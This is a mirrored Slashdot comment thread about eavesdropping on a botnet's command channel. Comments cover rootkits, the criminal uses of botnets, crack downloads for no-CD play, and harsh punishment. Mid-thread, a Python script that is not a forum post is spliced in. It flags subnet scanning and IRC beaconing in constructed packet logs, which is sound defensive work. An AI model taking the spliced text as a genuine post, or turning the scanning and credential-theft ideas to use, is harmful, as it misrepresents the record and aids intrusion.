Slashdot Mirror


Eavesdropping on a Botnet

wild3rbeast writes "Joe Stewart, a senior security researcher with LURHQ's Threat Intelligence Group has figured out a way to silently spy on a botnet's command-and-control infrastructure, and finds that for-profit crackers are clearly winning the cat-and-mouse game against entrenched anti-virus providers. From the article: 'The lesson here is once you get infected, you are completely under the control of the botmaster. He can put whatever he wants on your machine, and there's no way to be 100 percent sure that the machine is clean. The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.'"

185 comments

  1. Empty Words. by Enoxice · · Score: 1, Flamebait

    FTFA: "Stewart successfully started spying on the control channel, but there was not much to see."

    In other words: nothing to see here, just remember to patch your computers.

    Seriously, I was hoping for some real news, because I find malware incredibly interesting. Alas, TFA was a let-down...

    --
    Anyone else think the comments just weren't rendering right before they turned off ABP and saw ads?
  2. bot free, really... by MeatFlap3 · · Score: 2
    I would imagine this applies only to the BORG boxes out there... So if you are running Solaris on SPARC, are you safe from these bots?

    -r

    1. Re:bot free, really... by arivanov · · Score: 2, Insightful

      Flamebait, but I will take it.

      The first time I saw stealth kernel-mode rootkits in the wild for Linux and Solaris was Dec 1996. This is nearly 10 years ago. As a matter of fact, in this area Linux and Solaris were first and Windows did not really follow until 2K became commonplace in the home. From there on the malware writers came back and hacked 98 and Me.

      So your optimism regarding SloWarez is misplaced and misguided.

      --
      Baker's Law: Misery no longer loves company. Nowadays it insists on it
      http://www.sigsegv.cx/
  3. malware-free system? by Anonymous Coward · · Score: 4, Insightful

    "The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system." ...or to run a live-CD version of some OS where all you need to do is reboot
    options abound: Linux, BSD, Windo... oh, forget about that last one

    1. Re:malware-free system? by JamesTRexx · · Score: 4, Interesting

      Sort of like my first reaction, "The only way to be sure is to run something that is not Windows".

      Until someone creates something that can infect the various *nixes, that is.

      --
      home
    2. Re:malware-free system? by Nested · · Score: 5, Funny

      Until someone creates something that can infect the various *nixes, that is. Or an asteroid destroys Earth.

    3. Re:malware-free system? by marcello_dl · · Score: 2, Interesting

      How come a security guy doesn't mention live CDs? I seem to recall somebody did a live Windows CD. Personally I'd go for a free live distro, I'd boot from it and download clam or similar stuff to scan the HD. Unless the guy meant there could always be a rootkit not detectable by a current antivirus. But this level of paranoia should make you reinstall your OS every time you use your PC... and never install closed stuff like Windows, anyway.

      --
      ---- MISSING MISCELLANEOUS DATA SEGMENT --- [sigdash] trolololol
    4. Re:malware-free system? by Nutria · · Score: 4, Insightful
      Until someone creates something that can infect the various *nixes that is.

      It's called a rootkit. They've been around for years.

      Find a *ix server that's running a vulnerable process listening on an exposed port (DNS, ssh, ftp, http, pop, imap, smtp, whatever). Root that box and install your malware.

      Just by the virtue of the large number of x86 Linux servers exposed to the Intarweb, there must be thousands of systems just waiting to be rooted.

      Fortunately for "us", there are millions of exposed Windows client PCs running as Administrator, begging to be owned.

      --
      "I don't know, therefore Aliens" Wafflebox1
    5. Re:malware-free system? by httptech · · Score: 2, Insightful

      The actual quote in my analysis is "unless you are a malware expert..."

      Running a live CD with a rootkit scanner and an antivirus isn't going to cut it - you have to have the knowledge to know what to go after - you'd be surprised at how much malware doesn't get detected by scanners even months after it's been released.

      Although I might use liveCDs myself to do malware recovery, average users are going to be in over their heads. So I didn't mention it.

      -Joe

    6. Re:malware-free system? by xeoron · · Score: 1

      True... The best protection is just running a computer off a live CD and having network file storage.

    7. Re:malware-free system? by Yyrkoon420 · · Score: 1

      So I guess the idea of ERD 200x, Windows PE, etc. were completely lost on you? Let's not forget that at least the two items I've mentioned can actually mount, read, and write to an NTFS file system without problems, and ERD can break / reset passwds locally. There are also other options such as booting from USB (where you can use many different media types), booting into safe mode (assuming you're running Windows), and writing your own applications for finding, and dealing with, viruses in general. Since we're obviously talking mainly Windows here (key word: virus . . .) I think it's rather limited thinking that you would use a different OS to deal with said system.

    8. Re:malware-free system? by Anonymous Coward · · Score: 0

      Freeware RootkitRevealer by Sysinternals may help avoid an OS reinstall.

    9. Re:malware-free system? by thoughtlover · · Score: 1

      "process listening on an exposed port (DNS, ssh, ftp, http, pop, imap, smtp..."

      Not to mention Perl, PHP, SQL injection, AJAX hacks, and I'm sure that there will be some sort of way the CMOS could become infected someday... remember that an image is (was) just an image and can't infect your computer? What about UPnP? I'm sure people are trying to figure out a way to exploit that. Really, I don't profess to know anything. I just read the headlines, here.

      --
      No sig for you! Come back one year!
    10. Re:malware-free system? by Anonymous Coward · · Score: 0

      Hmmm.

      Or if the OS could be put on a write-locked flash thumbdrive.

      Personally I'd like that myself because then I wouldn't have to worry about badly written programs.

    11. Re:malware-free system? by linuxwood · · Score: 2, Insightful

      You do not need a rootkit to turn a linux box into a spam-bot... All it takes is one bad cgi/php page in a Web Hosting environment (100+ virtual sites) for a perl spam proxy to get launched from tmp on an unprotected port. Matt Wright has kept all the bad web developers in the business of poor web code for years.

      I cannot tell you how many bad "contact me" web pages exist on the Internet, with many of the worst being on Linux et al. Things like mod_security and PHP safe mode only mitigate certain cases. It's a pain plugging the holes of customer application code no matter how secure the operating system you are using to service them.

    12. Re:malware-free system? by Barryke · · Score: 1
      I guess it's more about user stupidity, not OS.
      Some users just click Yes without actually knowing what they're dealing with.

      'Oh no, it *web dialog* says I've got an insecure Linux!
      Very well, I will execute that very official-looking script this nice site offers!'

      ^ That's mostly ppl who use Windows, yes.

      --
      Hivemind harvest in progress..
    13. Re:malware-free system? by ericlondaits · · Score: 1

      Not really... a spammer once got inside my linux box at work through an Apache exploit (which, afaik, wasn't even available to outside IPs ... though not properly firewalled, I'll grant you that).

      Anyway, the thing is, the guy used a script-kiddie package to take control of the server and spam... the first signal when I came into the office next morning was the server severely thrashing around, but not because of the spamming but because (as I later found out through Google) every copy available of the package he used to seize control was infected with a Linux virus.

      Even when I managed to "fix" the machine, I still wasn't sure if the guy, package or virus had compromised any other part of my box, so I had to reinstall.

      --
      As a Slashdot discussion grows longer, the probability of an analogy involving cars approaches one.
    14. Re:malware-free system? by junglee_iitk · · Score: 1

      On Gentoo, the virus needs to self-recompile :)

  4. It's a bird. It's a plane. It's TC! by Anonymous Coward · · Score: 3, Funny

    "The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system."

    Trusted Computing to the rescue!

    1. Re:It's a bird. It's a plane. It's TC! by l33t+gambler · · Score: 5, Interesting
      Trusted Computing to the rescue!

      Absolutely! Trusted Computing is made to protect consumers from potential threats, but will it let consumers decide what is trustworthy? I recently discovered I had a UAService7.exe running in my Task Manager. After a search I found it is a SecuROM service, and lo and behold there's a service with that name in Services.

      I can't remember being asked by a game or application to install such a service, and I don't know how to remove it as there's no reference to it in either Start Menu or Add/Remove Programs.

      http://jooh.no/root/torrents/trusted-computing.torrent
      --
      Teasing the nobles, and rightfully so!
    2. Re:It's a bird. It's a plane. It's TC! by The+MAZZTer · · Score: 5, Informative

      Some games use it for CD verification. If you tamper with it (i.e. remove it) the game will likely fail its CD check and no longer run.

      I have a game that uses it, you probably agree to it in the EULA somewhere. I forget which game it was...

      Oh and I can't help but notice, as others have before me, that software pirates are not encumbered by these restrictions and bloatware, while legitimate customers are forced to use it.

    3. Re:It's a bird. It's a plane. It's TC! by mrbcs · · Score: 5, Insightful

      Every game I buy, before installation, I go to gamecopyworld.com and get the no-cd patch. I friggin HATE putting the cd in every stinkin time I want to play a game.

      --
      I'm not anti-social, I'm anti-idiot.
    4. Re:It's a bird. It's a plane. It's TC! by ScrewMaster · · Score: 1

      Indeed ... I trust it to be subverted at the earliest opportunity.

      --
      The higher the technology, the sharper that two-edged sword.
    5. Re:It's a bird. It's a plane. It's TC! by smitingpurpleemu · · Score: 1

      Gameburnworld.com works quite well as well. Sometimes I can't find stuff at one, so I look at both.

    6. Re:It's a bird. It's a plane. It's TC! by PSC · · Score: 1

      Trusted Computing is made to protect consumers from potential threats

      At least that's what they're selling us. Frankly, I have serious doubts about their motives. Probably the same doubts you seem to have:

      but will it let consumers decide what is trustworthy?

      Cynical question: Why should they? The average consumer has no idea whether a particular piece of software is trustworthy - they click "yes" in every dialog. Heck, they even click on phishing links. So when the TC chain detects a new service to be installed, it will most likely delegate the decision to someone allegedly trustworthy: the O/S vendor, who certifies applications. So basically only applications with a certificate from the O/S vendor can be installed.

      That train of thought leads directly to this really insightful remark by John Gilmore:

      "Be very glad that your PC is insecure - it means that after you buy it, you can break into it and install whatever software you want. What YOU want, not what Sony or Warner or AOL wants."

      Or some O/S vendor who shall remain unnamed.

      (At first I modded grandparent +1 Funny because the subject really made me laugh. A cynical laugh, mind you.)

      --
      --- The light at the end of the tunnel is probably a burning truck.
  5. Happened to me. by Anonymous Coward · · Score: 0

    This happened to me once... even with a fully patched XP, up to date Norton, and Ad-Aware installed. For peace of mind, I too decided the format/reinstall route was the best option. I've since switched to the Mac and have been problem free.

    1. Re:Happened to me. by Anonymous Coward · · Score: 0

      You probably had a weak password... patches won't save everything, you know.

    2. Re:Happened to me. by Anonymous Coward · · Score: 0

      Yeah, you're probably right. At the time it was a dictionary word, two numbers, and then another dictionary word.

    3. Re:Happened to me. by Anonymous Coward · · Score: 5, Funny

      My house was robbed once... even with fully locked doors, up to date alarm company subscription, and a dog. For peace of mind, I decided blowing up the house was the best option. I've since moved to the woods and have been civilization free.

    4. Re:Happened to me. by Anonymous Coward · · Score: 0

      do you know my dad

    5. Re:Happened to me. by JoeCommodore · · Score: 4, Funny
      This needs some re-working:

      My house was robbed once...

      It was one of those cheap houses, you know using old materials and not the best contractors (the doors and windows would not always close properly.)

      even with fully locked doors, up to date alarm company subscription, and a dog.

      Though that brand of locks uses one of five common keys, and the alarm company sometimes works with other companies to let marketers in, and the dog, as vigilant as he is, is just a dog and frankly pretty stupid.

      For peace of mind, I decided blowing up the house was the best option. I've since moved to the woods and have been civilization free.

      Actually it was more like a posh wooded suburb gated-community thing, where all the prices are higher and the selection is more limited, but the cars are to die for. I don't even associate with my old neighbors much anymore. My kids and wife are much happier and I have a lot less stress about stuff like that.

      Now if it were Linux, you would probably be in the woods, in some commune, inside an abandoned high-security military bunker, with a lot of really smart people that don't socialize all that well.

      --
      "Enjoy what you're doing! If it becomes drudgery, you're doing it wrong!" - Jim Butterfield
    6. Re:Happened to me. by Nutria · · Score: 1
      Now if it were Linux, you would probably be in the woods, in some commune, inside an abandoned high-security military bunker, with a lot of really smart people that don't socialize all that well.

      Humorous, but you've probably never been to a LinuxCon.

      --
      "I don't know, therefore Aliens" Wafflebox1
  6. Next opportunity by QuantumFTL · · Score: 5, Interesting

    Perhaps the next opportunity for profit in this game is to hack other people's botnets to bend to your own purposes? Probably a lot less risky than hacking thousands of potentially litigious members of the public. Secure encryption would stop most of this; however, the master endpoint computer would still have some vulnerability.

    1. Re:Next opportunity by Enoxice · · Score: 4, Funny

      I can see it now: In the future there will only be one botnet, then the entire hacking community will just be a big game of RootThisBox (http://rootthisbox.org/) (hmm...RTBs website seems to be redirecting to HackThisSite for some reason).

      --
      Anyone else think the comments just weren't rendering right before they turned off ABP and saw ads?
    2. Re:Next opportunity by Sir_Lewk · · Score: 1

      I'm sure it happens, though I think that at least the larger botmasters know enough of the tricks to protect themselves from others.

      --
      "linux is just DOS with a UNIX like syntax" -- Galactic Dominator (944134)
    3. Re:Next opportunity by Beryllium+Sphere(tm) · · Score: 1

      I wish I could remember where I read this so I could give you a cite, but there have been reports of turf wars over botnets already.

    4. Re:Next opportunity by ZzzzSleep · · Score: 1

      As always in situations like this, I give a link to Curious Yellow!

  7. PC Clinic by Short+Circuit · · Score: 5, Informative

    At my computer club's PC Clinic, I set up Ethereal on our network gateway computer, to keep track of things. You can easily see this kind of crap going on.

    1. Re:PC Clinic by JavaBrain · · Score: 1

      I'm assuming sophisticated key catchers do not have to post keys as they are typed, nor do they have to post the keys in the clear. Keeping that in mind, are you sure you can tell what's going on?

    2. Re:PC Clinic by Short+Circuit · · Score: 2, Interesting

      are you sure you can tell what's going on?

      Well, systems are only connected to our network for a few hours at most. Less, if we see traffic that bothers us. Like this last time, two of the machines started scanning all the IPs on the class C subnets adjacent to the subnet we were using. We put a stop to that. The only botnet activity I saw was repeated attempts to connect to the IRC port of a domain name. However, that domain had expired, so the bots couldn't connect.

      I'm looking around for a way to prevent machines on our network from talking to each other...putting each one on its own subnet seems like a good idea, but I don't know how to set up Linux dhcp to do it.
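A detector for the two behaviours Short Circuit describes above (clinic hosts sweeping the adjacent class C ranges, and repeated connection attempts to an IRC port that never get answered), written as an added example in Python over constructed tcpdump-style packet summaries. This is not code from the thread or from Ethereal; the clinic subnet, the addresses and the thresholds are all assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Assumption: the clinic's own /24 (constructed, not from the thread).
CLINIC_NET = ipaddress.ip_network("192.168.10.0/24")

# Constructed tcpdump/Ethereal-style summaries, not a real capture.
# Host .23 sweeps the adjacent /24; host .40 keeps sending SYNs to TCP/6667
# and never receives a SYN-ACK; host .8 completes one ordinary web connection.
SAMPLE_LINES = [
    f"12:00:{i:02d}.000 IP 192.168.10.23.1034 > 192.168.11.{i}.445: Flags [S]"
    for i in range(1, 21)
] + [
    "12:01:00.000 IP 192.168.10.40.1101 > 203.0.113.9.6667: Flags [S]",
    "12:01:03.000 IP 192.168.10.40.1101 > 203.0.113.9.6667: Flags [S]",
    "12:01:09.000 IP 192.168.10.40.1101 > 203.0.113.9.6667: Flags [S]",
    "12:01:21.000 IP 192.168.10.40.1102 > 203.0.113.9.6667: Flags [S]",
    "12:02:00.000 IP 192.168.10.8.2000 > 198.51.100.7.80: Flags [S]",
    "12:02:00.050 IP 198.51.100.7.80 > 192.168.10.8.2000: Flags [S.]",
    "12:02:00.100 IP 192.168.10.8.2000 > 198.51.100.7.80: Flags [.]",
]

# "<ts> IP <src>.<sport> > <dst>.<dport>: Flags [<flags>]"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)


def parse(lines):
    """Yield one record per line that matches the summary format; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["sport"] = int(rec["sport"])
            rec["dport"] = int(rec["dport"])
            yield rec


def adjacent_networks(net):
    """The same-sized networks immediately below and above `net` (the adjacent class C case)."""
    size = net.num_addresses
    base = int(net.network_address)
    result = []
    if base >= size:  # no network below 0.0.0.0/24
        result.append(ipaddress.ip_network((base - size, net.prefixlen)))
    result.append(ipaddress.ip_network((base + size, net.prefixlen)))
    return result


def find_adjacent_scanners(records, clinic_net=CLINIC_NET, min_targets=10):
    """Map local source IP -> number of distinct hosts in adjacent nets it sent SYNs to."""
    adjacent = adjacent_networks(clinic_net)
    targets = defaultdict(set)
    for r in records:
        src, dst = ipaddress.ip_address(r["src"]), ipaddress.ip_address(r["dst"])
        if r["flags"] != "S" or src not in clinic_net:
            continue
        if any(dst in n for n in adjacent):
            targets[str(src)].add(str(dst))
    return {s: len(t) for s, t in targets.items() if len(t) >= min_targets}


def find_failed_irc_beacons(records, irc_port=6667, min_attempts=3):
    """Map (src, dst) -> count of SYNs to the IRC port that were never answered with SYN-ACK."""
    attempts = defaultdict(int)
    answered = set()
    for r in records:
        if r["flags"] == "S" and r["dport"] == irc_port:
            attempts[(r["src"], r["dst"])] += 1
        elif r["flags"] == "S." and r["sport"] == irc_port:
            answered.add((r["dst"], r["src"]))  # reply flows server -> client
    return {k: n for k, n in attempts.items() if n >= min_attempts and k not in answered}


def triage(lines=SAMPLE_LINES):
    """Run both detectors over the summaries and return their findings."""
    records = list(parse(lines))
    return {
        "scanners": find_adjacent_scanners(records),
        "irc_beacons": find_failed_irc_beacons(records),
    }


if __name__ == "__main__":
    for kind, hits in triage().items():
        for key, n in hits.items():
            print(f"{kind}: {key} ({n})")
```

Feed it `tcpdump -n -tt`-style SYN summaries from the gateway and tune `min_targets` and `min_attempts` to the clinic's normal traffic; a host answered on the IRC port is deliberately not reported, since only the unanswered beaconing matches the expired-domain case in the comment.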

    3. Re:PC Clinic by Ravatar · · Score: 1

      Well it depends on how you define "talking to each other", in some situations you want this to be possible I'm assuming. However for particular ports, couldn't this easily be accomplished with iptables? Sorry for the potential ignorance, I'm not too horribly familiar with ipchains/iptables.

    4. Re:PC Clinic by Short+Circuit · · Score: 1

      Sort of.

      iptables (and other filtering software) would only be effective if the bad packets were required to pass through the machine with the filtering on it. The problem is, if two machines are on the same subnet, they can communicate directly with each other, ignoring the machine with the filtering software on it.

      One possible solution is to force each machine attached to the network onto its own subnet. The problem is, I don't know of a dhcpd that will put machines on different subnets without a means of identifying which machines should go to which subnet. And then there's the issue of creating alias IP addresses on the filter/gateway machine for each subnet in use. (Otherwise, the "patient" computer won't be able to access the network at all.)

      Of course, a decent Cisco switch should be able to do it...but by the time any student at our college knows how to work Cisco, he's already moved on to a four-year institution. Hmm...maybe I should invite GVSU's or Davenport's Computer Club equivalents to participate in our clinic. I've got contacts...

    5. Re:PC Clinic by bjohnson · · Score: 1
      I'm looking around for a way to prevent machines on our network from talking to each other...

      Scissors http://www.dumbentia.com/pdflib/scissors.pdf
    6. Re:PC Clinic by Short+Circuit · · Score: 1

      That's essentially what we do...keep machines disconnected unless they need to be. Unfortunately, that adds a bottleneck to our servicing process, which is why I'm looking for a higher-level solution.

  8. To clarify... by Drinian · · Score: 1, Insightful
    The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.

    :s/reinstall the operating system/install Linux/g

    1. Re:To clarify... by Anonymous Coward · · Score: 0

      :s/install Linux/put a gun in your mouth and pull the trigger/g

  9. "Post to Slashdot" by Gopal.V · · Score: 2, Interesting
    It is the first time I've ever seen a "Post to Slashdot" icon on any news item.

    (yeah, I pretty much forgive the Digg one, everybody has those ...)

    1. Re:"Post to Slashdot" by triso · · Score: 1
      It is the first time I've ever seen a "Post to Slashdot" icon on any news item....
      It isn't very useful yet--it only goes to the submit screen, most of the fields are blank and it doesn't even fill in the URL of where you clicked on the "Post to Slashdot" button to get here.
  10. Joe Stewart said Comedy Gold! by Anonymous Coward · · Score: 0

    OMG Think he's a goon??

  11. Makes you wonder what else is going on by perkr · · Score: 5, Insightful

    Spam is one thing, but once you've got access to the machine, getting logins and passwords for online stock and bank account services via a keylogger is completely different. I wonder how much stuff is silently running on users' machines right now...

    1. Re:Makes you wonder what else is going on by mapkinase · · Score: 1

      There should be tougher laws on people who break into computers. It should be equal to breaking and entering people's houses.

      Tough laws work given their enforcement (I mean, once someone is caught and gets 10 years of gang-infested prison time, people will look at the keyboard in a different way).

      --
      I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
    2. Re:Makes you wonder what else is going on by Lusa · · Score: 2, Interesting

      Perhaps, but there is a massive flaw. This assumes that the people doing this can be caught and prosecuted. Chances are they aren't even on the same continent as the computer. Until the planet is under some kind of single law then this sort of thing will not work. I think it'd be easier and better to isolate and control network traffic. Have a safe known configuration of OS, programs, firewalls etc in a read only format that can quickly be ghosted back onto the hardware if an infection is detected. Sort of like a live CD but personalised. Of course, this would require an overhaul of the way things are done. But it needs to be done. Now, if we could get offensive firewalls as in Ghost in the Shell we could have some fun :D

    3. Re:Makes you wonder what else is going on by mapkinase · · Score: 0, Offtopic

      It does require a lot of effort, but for every uncatchable hacker there are plenty of loser hackers. Catch them, and punish dearly so the "uncatchable" ones think twice.

      --
      I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
    4. Re:Makes you wonder what else is going on by msobkow · · Score: 1

      Most of the traffic I log and run a traceroute on bounces through a number of nodes into the "darknet" of unregistered IP addresses. Even there it bounces through 3-5 darknet nodes before hitting a recognizable backbone or gateway node. Although certain nations' primary gateways are common, there is no way to tell whether the attacker is located in that nation or using compromised darknet machines in that nation.

      The odds are that the majority are located in Canada or the US and simply using darknet proxies.

      --
      I do not fail; I succeed at finding out what does not work.
    5. Re:Makes you wonder what else is going on by mapkinase · · Score: 1

      When the crime is more widespread, the darknet will be hit by interested governments.

      I think that the problem with this is that there are tons of dummies with unprotected computers that do not see the disadvantage of their computers being used for "dark" purposes.

      In short, big problems will get big attention, small problems are getting small attention. Inasmuch as personally I want every organized criminal whipped, hanged, executed, tortured and very much dead, the trouble from them seems not that big. Otherwise, the repuglican dogs would be unleashed on them.

      --
      I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
    6. Re:Makes you wonder what else is going on by uvajed_ekil · · Score: 1
      There should be tougher laws on people who break into computers. It should be equal to breaking and entering people's houses. Tough laws work given their enforcement (I mean, once someone is caught and gets 10 years of gang-infested prison time, people will look at the keyboard in a different way).

      As the US criminal justice system proves every day, stiff penalties for crimes do not necessarily act as effective deterrents. We have embarrassingly high violent crime rates in the US, despite the penalties being more harsh than in most of Europe and many other places. Until the certainty of apprehension becomes greater (i.e. unless potential criminals think they'll get caught) we'll continue to have high crime rates. I suspect the same applies to computer-based crimes; for-profit hackers don't care about the jail time since they are usually not caught to begin with.

      You could make the penalty for all crimes death by hanging, but if you have no cops catching people, or even knowing where and how to do so, you'll still have crime.

      --
      This is a hacked account, for which the owner can not be held responsible.
    7. Re:Makes you wonder what else is going on by mapkinase · · Score: 1

      Well, the crime in the US is localized to poor neighborhoods, mostly. Maybe poor neighborhoods should have preventive laws, like curfew for youngsters, like prohibition of gathering more than 3. I am just throwing ideas here.

      The laws are tough for murder, but they are nearly not tough enough for prostitution and drugs. Basically every shady business that organized crime feeds on should be penalized severely - bookmakers, gamblers, shark loaning, drugs, prostitution, what else...

      I am telling you people will think twice before dealing a baggy of pot if they knew that they will get life or beheading for that.

      --
      I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
    8. Re:Makes you wonder what else is going on by Anonymous Coward · · Score: 0
      Common things they are used for at the moment include:
      • Proxies for further system cracking (self-explanatory)
      • Spam proxies (specialised SMTP proxies rented out to spammers for, say, Send-Safe)
      • Spyware installation (some spyware companies, for example VX2, have a long and illustrious history - despite their denials - of paying "affiliates" more or less per-seat, which could be lucrative given access to a botnet of Windows machines you utterly do not care about)
      • Data mining for identity theft, via keylogging and/or static analysis (at the moment; banking, Paypal, eGold login/passwords, and of course the old faithful credit card numbers, but also some more exotic things; in particular MMORPG login/passwords - WoW gold goes for around $50-$70 per 1000g, so you may wake up to find your epics vendored and your account cleaned out)
      • and of course the old classic, DDoS extortion and botwars
      Occasionally, they are used for less common things. Some things that spring to mind:
      • Proxies for "bulletproof" hosting (think spam sites, when they don't want to use Russia or China, although the spammers themselves are frequently American)
      • Cryptoviral extortion (which is to say, "We have encrypted your files - pay up and we decrypt them")
      • Illicit webservers or FTP dumps containing stuff you do NOT want to be even unknowingly hosting, enough said
    9. Re:Makes you wonder what else is going on by Pantero+Blanco · · Score: 5, Insightful

      You'd also end up with many more dead cops, and much more sympathy for those criminals. If the penalty for dealing pot or prostitution was death or life in prison, I for one would offer safe haven and protection to pot dealers and prostitutes.

    10. Re:Makes you wonder what else is going on by uvajed_ekil · · Score: 1
      I still don't understand why people think we need longer jail/prison sentences. Doing as "little" as a few years, 6 months, or even a few weeks' time would surely alter every aspect of my life, which is true for most people, as well. Even 30 days in the county jail would cause me to lose my job, my home, and most of my possessions, so increasing the penalty for a crime to a year or two wouldn't be much more effective than a month in the clink. But if I really think I can get away with something, I might still do it, either way. (Not me personally, just talking hypothetically.)

      As for restrictions on people in poor neighborhoods, as suggested? That stinks of Soviet Russia and modern North Korea. We have lots of crime in the US, but we also have a Constitution. Crime sucks, but our freedom is what makes this the greatest country in the world. Economic discrimination is as horrible as any other form of discrimination. If you want to eliminate ghetto crime, eliminate the ghettos.

      This discussion was really about botnets and associated crime, for which there are already criminal penalties. But as I said, no one is catching these folks with any regularity, and until we do the length of prison terms makes absolutely no difference.

      --
      This is a hacked account, for which the owner can not be held responsible.
    11. Re:Makes you wonder what else is going on by mapkinase · · Score: 1

      It is not about you. One of the purposes of punishment is deterrence. One thing is stealing for yourself, another thing is bookmaking for the so-called mafia.

      There is a big difference between crime and organized crime. The latter should be stopped by all means.

      If a person is showing even a sign of Cribs, he should be executed on the spot. That is how organized crime should be dealt with.

      --
      I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
    12. Re:Makes you wonder what else is going on by Anonymous Coward · · Score: 0

      Wow. I really hope you're trolling.

    13. Re:Makes you wonder what else is going on by suffe · · Score: 1

      Who wouldn't, death penalty or not.

      --
      Karma: 2.71828182846 (Mostly due to small, fun pills)
    14. Re:Makes you wonder what else is going on by Anonymous Coward · · Score: 0

      wait, do your suggestions apply only to other people, or to you too? For example, if you hand a prostitute some money, should you be executed on the spot (no chance to defend yourself, etc)?

    15. Re:Makes you wonder what else is going on by Anonymous Coward · · Score: 0

      Basically every shady business that organized crime feeds on should be penalized severely - bookmakers, gamblers, shark loaning, drugs, prostitution, what else...

      Politics.

    16. Re:Makes you wonder what else is going on by Anonymous Coward · · Score: 0
      Basically every shady business that organized crime feeds on should be penalized severely - bookmakers, gamblers, shark loaning, drugs, prostitution, what else...
      Politics.
      Law enforcement...
    17. Re:Makes you wonder what else is going on by uvajed_ekil · · Score: 1
      Huh? In some jurisdictions, depending on the quantity, selling pot can net you many years in prison. I have no idea what you are talking about, whether you mean you would protect simple pot dealers (for which I can't blame you) or that you would like to see pot dealers in prison (which seems like a waste of valuable resources). Please elaborate.

      Even in places where there are serious penalties for selling pot, demand and supply have remained high (no pun intended). Pot may alter some people's lives a bit (as can overeating, watching lots of television, reading too many sci-fi novels and choosing to do many other things that are "unproductive"), and it may appear most frequently in poor neighborhoods, but pot is known amongst all socioeconomic groups and doesn't kill anyone, so I see no point in cracking down on it. Doing so has never been proven to eliminate or lessen crime in general.

      As for prostitution, most hookers are uneducated women who feel they can make more money and be happier turning tricks than working at legitimate minimum wage jobs. I wish they didn't feel a need to sell their bodies, but what else can they do? Making $200 a week at a legit job doesn't pay the bills of the most modest family. More than anything, I feel bad for these people and that they have to resort to "criminal" means to live a still very hard life.

      --
      This is a hacked account, for which the owner can not be held responsible.
    18. Re:Makes you wonder what else is going on by uvajed_ekil · · Score: 1
      Yes, he should, because that means he is a participant of organized crime (as well as being a hypocrite). That is by his logic though, not mine. I could argue that him speeding in a 35mph zone constitutes a premeditated act against common laws (he got in his car, started it, and proceeded to drive at reckless speeds -- lock him up!!), so he should have the benefit of NO doubt.

      That's just silly though, as are our penalties for "victimless" crimes. Sure, crack smokers are getting into lots of trouble because they smoke crack, but their underlying problem is being poor, dumb, and destitute. If we, as a society, can prevent them from ever being these things, they'll probably never make the bad choice to hit the rock in the first place.

      As for obviously thought-out crimes like identity theft and running botnets for profit, come on, these people are obviously smart and obviously greedy. They have valuable skills but CHOOSE to use them for evil rather than good because being middle-class isn't good enough for them. Different game here. Fuck'em, lock 'em up.

      --
      This is a hacked account, for which the owner can not be held responsible.
    19. Re:Makes you wonder what else is going on by uvajed_ekil · · Score: 1
      You'd also end up with many more dead cops, and much more sympathy for those criminals. If the penalty for dealing pot or prostitution was death or life in prison, I for one would offer safe haven and protection to pot dealers and prostitutes.

      We already have more cops killed every year in the US than in all other Western nations combined, even with our harsher criminal penalties. Thanks for making my point for me!

      --
      This is a hacked account, for which the owner can not be held responsible.
    20. Re:Makes you wonder what else is going on by geschild · · Score: 1

      Your post could be a troll, but since you attach your name to it, I'll reply.

      Your 'plan' would mean that the prison system wouldn't just be 'overloaded' but it would gravitate out of control before the year was up, putting lots of people in prison who have been functioning members of society. The cost to society would be unimaginable: prisoners cost a lot of money to accommodate and those imprisoned do not contribute to society, monetarily or otherwise.

      And all this for what? Because your personal beliefs are different from these people's? People who use drugs or prostitute themselves are not harming anyone else with their actions, no matter how hard you argue.

      (And should you drink alcohol, you yourself are a 'drug-user' too. One of the 'hardest' drugs around, actually: http://news.bbc.co.uk/1/hi/uk_politics/5230006.stm )

      I suggest you read up on the principles of penal systems before you go and advise modifications to one.

      --
      Karma? What's that again?
    21. Re:Makes you wonder what else is going on by Anonymous Coward · · Score: 0

      Did you read the post the parent post was replying to, or did you get two different posters confused? He's saying that putting them to death would be a dumb thing to do, and he'd protect them if that were the case. The post above him is the one calling for harsher punishments.

    22. Re:Makes you wonder what else is going on by mapkinase · · Score: 1

      Well, since you started about alcohol (or tobacco, why not), I am against it too. Alcohol consumption should be punished by flogging.

      As for trolling. The changes I am proposing should be gradual - gradual increase of punishment. Then there will be no significant increase in prison population.

      Also inevitable is the idea of restricting rights. As I proposed in one of my posts in this thread, the troublesome gang-infested communities should have had their basic freedoms restricted a long time ago. Total sweeping raids of the houses in these communities should be allowed.

      The problem with the American population is that it ties economic and political rights too closely together. One has to realize that crime getting out of hand can be stopped only at the expense of political freedoms.

      The more economic freedom you have (read: more laissez-faire), the more disparity you have; the more economic disparity you have, the more you need to suppress the population disillusioned with the American Dream. Sounds like it's from a classic Marxist book, I know.

      Low crime and political freedoms are highly incompatible. Crime is rampant in Europe. Since Putin (whom I detest with every gut) came to power in Russia, there is much less political freedoms and less organized crime - the streets of Moscow are safer.

      According to Marx, again, the state is just an organized gang. If you limit the actions of that gang, other organized gangs will sprout. A good state is the monopoly of one organized gang. A neighborhood controlled totally by one gang is safer than a neighborhood with gang feuds.

      As for labeling, I am surprised, but not much.

      End of musings.

      --
      I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
    23. Re:Makes you wonder what else is going on by geschild · · Score: 1



      Right. That settles it. You're off your trolley.

      This is an experiment that has been done and its consequences were (arguably) much worse than its benefits: alcohol-prohibition ring a bell?

